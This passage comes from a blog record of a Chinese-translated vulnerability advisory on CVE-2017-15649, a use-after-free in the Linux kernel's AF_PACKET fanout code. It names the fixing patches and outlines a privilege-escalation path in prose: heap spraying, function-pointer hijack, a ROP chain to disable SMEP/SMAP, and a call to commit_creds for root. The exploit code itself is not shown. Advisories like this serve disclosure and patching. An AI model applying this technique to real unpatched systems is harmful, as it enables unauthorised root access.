\t\t\t\t\t struct net_device *,  \t\t\t\t\t struct packet_type *,  \t\t\t\t\t struct net_device *);  \tbool\t\t\t(*id_match)(struct packet_type *ptype,  \t\t\t\t\t    struct sock *sk);  \tvoid\t\t\t*af_packet_priv;  \tstruct list_head\tlist;  };  &#8220;`<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a8d094280951-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a8d094280951-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a8d094280951-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a8d094280951-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a8d094280951-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a8d094280951-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a8d094280951-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a8d094280951-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a8d094280951-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a8d094280951-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a8d094280951-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a8d094280951-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a1c8f6415a8d094280951-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a1c8f6415a8d094280951-14\">14<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a8d094280951-1\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a8d094280951-2\"><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">packet_type<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a8d094280951-3\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">__be16\t\t\t<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/* This is really htons(ether_type). *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a8d094280951-4\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">net_device\t*<\/span><span class=\"crayon-v\">dev<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">\t<\/span><span class=\"crayon-c\">\/* NULL is wildcarded here\t&nbsp;&nbsp;&nbsp;&nbsp; *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a8d094280951-5\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">func<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sk_buff *<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a8d094280951-6\"><span class=\"crayon-h\">\t\t\t\t\t <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">net_device *<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a8d094280951-7\"><span class=\"crayon-h\">\t\t\t\t\t <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">packet_type *<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a8d094280951-8\"><span class=\"crayon-h\">\t\t\t\t\t <\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">net_device *<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a8d094280951-9\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">bool<\/span><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">id_match<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">packet_type *<\/span><span class=\"crayon-v\">ptype<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a8d094280951-10\"><span class=\"crayon-h\">\t\t\t\t\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sock *<\/span><span class=\"crayon-v\">sk<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a8d094280951-11\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">af_packet_priv<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a8d094280951-12\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">list_head\t<\/span><span class=\"crayon-v\">list<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a1c8f6415a8d094280951-13\"><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a1c8f6415a8d094280951-14\"><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">`<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0012 seconds] -->  <\/p>\n<p>\u7ed3\u6784\u4f53packet_type\u5185\u90e8\u7684\u51fd\u6570\u6307\u9488\uff0c\u4fdd\u5b58\u5728\u4e00\u4e2a\u5927\u7684slab\u5206\u914d\u5668\uff08kmalloc-4096\uff09\u4e2d\uff0c\u8fd9\u4f7f\u5f97\u5806\u55b7\u5c04\u53d8\u66f4\u5bb9\u6613\u548c\u66f4\u53ef\u9760\uff0c\u56e0\u4e3a\u5185\u6838\u8f83\u5c11\u4f7f\u7528\u8f83\u5927slab\u5206\u914d\u5668\u3002<\/p>\n<p>\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u5e38\u89c4\u7684\u5185\u6838\u5806\u55b7\u5c04\u6765\u66ff\u6362\u88ab\u91ca\u653e\u7684packet_fanout\u5bf9\u8c61\u7684\u5185\u5bb9\uff0c\u4f8b\u5982\u7528sendmmsg()\u6216\u5176\u5b83\u51fd\u6570\u3002<\/p>\n<p>\u5373\u4f7f\u5206\u914d\u7684\u5185\u5b58\u7a7a\u95f4\u4e0d\u662f\u6c38\u4e45\u7684\uff0c\u4f46\u4ecd\u7136\u53ef\u4ee5\u66ff\u6362packet_fanout\u4e2d\u7684\u76ee\u6807\u5185\u5bb9\uff08\u4f8b\u5982\u51fd\u6570\u6307\u9488\uff09\uff0c\u5e76\u4e14\u7531\u4e8ekmalloc-4096\u975e\u5e38\u7a33\u5b9a\uff0c\u6240\u4ee5\u6211\u4eec\u7684payload\u51e0\u4e4e\u4e0d\u53ef\u80fd\u88ab\u5176\u5b83\u5206\u914d\u7834\u574f\u3002<\/p>\n<p>\u5f53\u4f7f\u7528dev_queue_xmit()\u53d1\u9001\u4e00\u4e2askb\u65f6\u4f1a\u8c03\u7528id_match()\uff0c\u901a\u8fc7AF_PACKET\u5957\u63a5\u5b57\u4e0a\u7684sendmsg\u53ef\u4ee5\u5230\u8fbe\u8be5\u8def\u5f84\u3002\u5982\u679cdev_queue_xmit\u53c2\u6570\u975eNULL\uff0c\u5b83\u901a\u8fc7\u8c03\u7528id_match()\u7684\u5305\u5904\u7406\u7a0b\u5e8f\u5217\u8868\u8fdb\u884c\u5faa\u73af\u3002\u56e0\u6b64\uff0c\u53ef\u4ee5\u901a\u8fc7\u4e0b\u8ff0\u65b9\u5f0f\u8fdb\u884c\u6f0f\u6d1e\u5229\u7528\u3002<\/p>\n<p>\u4e00\u65e6\u77e5\u9053\u4e86\u5185\u6838\u7684\u4ee3\u7801\u6bb5\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u628a\u5185\u6838\u6808\u8f6c\u6362\u6210\u6211\u4eec\u4f2a\u9020\u7684packet_fanout\u5bf9\u8c61\u548cROP\u3002\u7b2c\u4e00\u4e2a\u53c2\u6570ptype\u5305\u542b\u6211\u4eec\u4f2a\u9020\u5bf9\u8c61\u7684prot_hook\u6210\u5458\u7684\u5730\u5740\uff0c\u8fd9\u4f7f\u5f97\u6211\u4eec\u77e5\u9053\u5728\u54ea\u91cc\u8df3\u8f6c\u3002<\/p>\n<p>\u4e00\u65e6\u8fdb\u5165ROP\uff0c\u6211\u4eec\u53ef\u4ee5\u8df3\u8f6c\u5230native_write_c4(x)\u53bb\u5173\u95edSMEP\/SMAP\uff0c\u7136\u540e\u8df3\u56de\u5230\u7528\u6237\u7a7a\u95f4\u6267\u884c\u6211\u4eec\u771f\u6b63\u7684payload\uff0c\u901a\u8fc7\u8c03\u7528commit_creds(prepare_kernel_cred(0))\uff0c\u5c06\u6211\u4eec\u6743\u9650\u63d0\u5347\u81f3root \u3002<\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3543\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 27 Nov 2017 08:12:04 +0000<\/strong><\/p>\n<p>\u6f0f\u6d1e\u6982\u8981 \u4ee5\u4e0b\u5b89\u5168\u516c\u544a\u63cf\u8ff0\u4e86\u5728Linux\u5185\u6838\u7684AF_PACKET\u4e2d\u5b58\u5728\u7684\u4e00\u4e2aUAF\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u8be5\u6f0f\u6d1e\u53ef\u80fd\u5bfc\u81f4\u6743\u9650\u63d0\u5347\u3002 AF_PACKET\u5957\u63a5\u5b57\u201d\u5141\u8bb8\u7528\u6237\u5728\u8bbe\u5907\u9a71\u52a8\u5c42\u53d1\u9001\u6216\u8005\u63a5\u6536\u6570\u636e\u5305\u201d\u3002\u4f8b\u5982\uff0c\u7528\u6237\u53ef\u4ee5\u5728\u7269\u7406\u5c42\u4e4b\u4e0a\u5b9e\u73b0\u81ea\u5df1\u7684\u534f\u8bae\uff0c\u6216\u8005\u55c5\u63a2\u5305\u542b\u4ee5\u592a\u7f51\u6216\u66f4\u9ad8\u5c42\u534f\u8bae\u5934\u7684\u6570\u636e\u5305\u3002 \u6f0f\u6d1e\u63d0\u4ea4\u8005 \u4e00\u540d\u72ec\u7acb\u7684\u5b89\u5168\u7814\u7a76\u4eba\u5458\u53d1\u73b0\u5e76\u5411 Beyond Security \u7684 SSD \u62a5\u544a\u4e86\u8be5\u6f0f\u6d1e\u3002 \u5382\u5546\u54cd\u5e94 \u66f4\u65b0\u4e00 CVE:CVE-2017-15649 \u201c\u8be5\u6f0f\u6d1e\u5f88\u53ef\u80fd\u5df2\u7ecf\u901a\u8fc7\u4ee5\u4e0b\u65b9\u5f0f\u4fee\u590d\u4e86\uff1a packet: \u91cd\u65b0\u7ed1\u5b9afanout hook\u65f6\u4fdd\u6301\u7ed1\u5b9a\u9501\u5b9a &#8211; http:\/\/patchwork.ozlabs.org\/patch\/813945\/ \u4e0e\u6b64\u76f8\u5173\uff0c\u4f46\u672a\u5408\u5e76\u7684\u662f packet:\u5728packet_do_bind\u51fd\u6570\u4e2d\uff0c\u4f7f\u7528bind_lock\u6d4b\u8bd5fanout &#8211; http:\/\/patchwork.ozlabs.org\/patch\/818726\/ \u6211\u4eec\u9a8c\u8bc1\u4e86\u5728v4.14-rc2\u4e0a\u4e0d\u4f1a\u89e6\u53d1\u8be5\u6f0f\u6d1e\uff0c\u4f46\u5728\u7b2c\u4e00\u6b21commit(008ba2a13f2d)\u4e0a\u6d4b\u8bd5\u6210\u529f\u3002&#8221; \u6f0f\u6d1e\u8be6\u7ec6\u4fe1\u606f \u8be5UAF\u6f0f\u6d1e\u662f\u7531\u4e8efanout_add(\u6765\u81easetsockopt)\u548cAF_PACKET\u5957\u63a5\u5b57\u4e4b\u95f4\u7ade\u4e89\u6761\u4ef6\u5bfc\u81f4\u7684\u3002 \u5373\u4f7f\u5df2\u7ecf\u4ecefanout_add()\u521b\u5efa\u4e86\u4e00\u4e2apacket_fanout\uff0c\u7ade\u4e89\u4e5f\u4f1a\u5bfc\u81f4\u6765\u81eapacket_do_bind()\u7684__unregister_prot_hook()\u5c06po-> running\u8bbe\u7f6e\u4e3a0\u3002 \u8fd9\u5141\u8bb8\u6211\u4eec\u7ed5\u8fc7packet_release()\u4e2d\u7684unregister_prot_hook()\u7684\u68c0\u67e5\uff0c\u4ece\u800c\u5bfc\u81f4\u5373\u4f7fpacket_fanout\u5df2\u7ecf\u88ab\u91ca\u653e\uff0c\u4f46\u662f\u4ecd\u7136\u53ef\u4ee5\u4ecepacket_type\u94fe\u63a5\u5217\u8868\u5f15\u7528\u3002 \u6f0f\u6d1e\u8bc1\u660e [crayon-5a1c8f5b84fe1712795706\/] \u5d29\u6e83\u65e5\u5fd7 [crayon-5a1c8f5b84fea292617098\/] \u6211\u4eec\u77e5\u9053\u5df2\u7ecf\u88ab\u91ca\u653e\u7684\u662f\u4e00\u4e2akmalloc-4096\u5bf9\u8c61\uff1a [crayon-5a1c8f5b84ff4648568286\/] \u5f53\u901a\u8fc7af_packet.c\u4e2d\u7684register_prot_hook()\u7684dev_add_pack()\u8fdb\u884c\u6ce8\u518c\u65f6\uff0c\u5b83\u7684prot_hook\u6210\u5458\u5728packet handler\u4e2d\u88ab\u5f15\u7528\uff1a [crayon-5a1c8f5b84ff7247098366\/] \u7ed3\u6784\u4f53packet_type\u5185\u90e8\u7684\u51fd\u6570\u6307\u9488\uff0c\u4fdd\u5b58\u5728\u4e00\u4e2a\u5927\u7684slab\u5206\u914d\u5668\uff08kmalloc-4096\uff09\u4e2d\uff0c\u8fd9\u4f7f\u5f97\u5806\u55b7\u5c04\u53d8\u66f4\u5bb9\u6613\u548c\u66f4\u53ef\u9760\uff0c\u56e0\u4e3a\u5185\u6838\u8f83\u5c11\u4f7f\u7528\u8f83\u5927slab\u5206\u914d\u5668\u3002 \u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u5e38\u89c4\u7684\u5185\u6838\u5806\u55b7\u5c04\u6765\u66ff\u6362\u88ab\u91ca\u653e\u7684packet_fanout\u5bf9\u8c61\u7684\u5185\u5bb9\uff0c\u4f8b\u5982\u7528sendmmsg()\u6216\u5176\u5b83\u51fd\u6570\u3002 \u5373\u4f7f\u5206\u914d\u7684\u5185\u5b58\u7a7a\u95f4\u4e0d\u662f\u6c38\u4e45\u7684\uff0c\u4f46\u4ecd\u7136\u53ef\u4ee5\u66ff\u6362packet_fanout\u4e2d\u7684\u76ee\u6807\u5185\u5bb9\uff08\u4f8b\u5982\u51fd\u6570\u6307\u9488\uff09\uff0c\u5e76\u4e14\u7531\u4e8ekmalloc-4096\u975e\u5e38\u7a33\u5b9a\uff0c\u6240\u4ee5\u6211\u4eec\u7684payload\u51e0\u4e4e\u4e0d\u53ef\u80fd\u88ab\u5176\u5b83\u5206\u914d\u7834\u574f\u3002 \u5f53\u4f7f\u7528dev_queue_xmit()\u53d1\u9001\u4e00\u4e2askb\u65f6\u4f1a\u8c03\u7528id_match()\uff0c\u901a\u8fc7AF_PACKET\u5957\u63a5\u5b57\u4e0a\u7684sendmsg\u53ef\u4ee5\u5230\u8fbe\u8be5\u8def\u5f84\u3002\u5982\u679cdev_queue_xmit\u53c2\u6570\u975eNULL\uff0c\u5b83\u901a\u8fc7\u8c03\u7528id_match()\u7684\u5305\u5904\u7406\u7a0b\u5e8f\u5217\u8868\u8fdb\u884c\u5faa\u73af\u3002\u56e0\u6b64\uff0c\u53ef\u4ee5\u901a\u8fc7\u4e0b\u8ff0\u65b9\u5f0f\u8fdb\u884c\u6f0f\u6d1e\u5229\u7528\u3002 \u4e00\u65e6\u77e5\u9053\u4e86\u5185\u6838\u7684\u4ee3\u7801\u6bb5\uff0c\u6211\u4eec\u5c31\u53ef\u4ee5\u628a\u5185\u6838\u6808\u8f6c\u6362\u6210\u6211\u4eec\u4f2a\u9020\u7684packet_fanout\u5bf9\u8c61\u548cROP\u3002\u7b2c\u4e00\u4e2a\u53c2\u6570ptype\u5305\u542b\u6211\u4eec\u4f2a\u9020\u5bf9\u8c61\u7684prot_hook\u6210\u5458\u7684\u5730\u5740\uff0c\u8fd9\u4f7f\u5f97\u6211\u4eec\u77e5\u9053\u5728\u54ea\u91cc\u8df3\u8f6c\u3002 \u4e00\u65e6\u8fdb\u5165ROP\uff0c\u6211\u4eec\u53ef\u4ee5\u8df3\u8f6c\u5230native_write_c4(x)\u53bb\u5173\u95edSMEP\/SMAP\uff0c\u7136\u540e\u8df3\u56de\u5230\u7528\u6237\u7a7a\u95f4\u6267\u884c\u6211\u4eec\u771f\u6b63\u7684payload\uff0c\u901a\u8fc7\u8c03\u7528commit_creds(prepare_kernel_cred(0))\uff0c\u5c06\u6211\u4eec\u6743\u9650\u63d0\u5347\u81f3root \u3002<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[15774,11946,10757,13145],"class_list":["post-10624","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-chinese-translation","tag-privilege-escalation","tag-securiteam-secure-disclosure","tag-use-after-free"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10624","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10624"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10624\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10624"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10624"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10624"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}